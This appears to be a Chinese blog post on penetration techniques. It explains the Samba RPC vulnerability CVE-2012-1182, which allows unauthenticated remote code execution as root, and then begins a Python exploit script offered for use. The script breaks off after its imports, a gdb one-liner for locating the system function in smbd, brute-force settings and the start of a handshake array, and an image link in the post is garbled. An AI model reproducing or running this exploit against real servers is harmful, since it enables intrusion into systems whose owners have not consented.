Samba 0day(CVE-2012-1182)分析及利用

标签:
samba0daycve-2012-1182exploit利用最新samba0day杂谈 |
分类: 渗透技术 |
Samba 0day(CVE-2012-1182)分析及利用
Samba是在Linux及UNIX系统上实现SMB(Server Messages Block)协议的一套免费软件,由服务端及客户端程序构成,是一套可以跨平台进行文件共享和打印共享服务的程序。
该漏洞允许用户从一个远程匿名链接以root用户上下文来执行任意代码。
产生原因:
Samba的RPC代码生成器中包含了一个错误而导致生成的代码中存在安全漏洞(生成的代码用于控制RPC调用的解码和编码),从而导致包含数组长度的变 量与为数据分配内存的变量检查不一致并可由链接的客户端所控制,远程攻击者可以通过自定义一个特殊的RPC调用方式来以root用户上下文执行任意代码 (代码包含),而这一过程并不需要身份验证的链接。
有图有真相:
http://s3/middle/714c124fgcbaa72748332&6900day(CVE-2012-1182)分析及利用" TITLE="Samba
EXP如下:
#!/usr/bin/python
#
# finding targets 4 31337z:
# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1
| awk '{ print $2 }'` <<< `echo -e "print system"` | grep
'$1'
#
# found by eax samba 0day godz (loljk)
from binascii import hexlify, unhexlify
import socket
import threading
import SocketServer
import sys
import os
import time
import
struct
targets = [
]
do_brute = True
rs = 1024
FILTER=''.join([(len(repr(chr(x)))==3) and chr(x) or '.' for x in
range(256)])
def dump(src, length=32):
sploitshake = [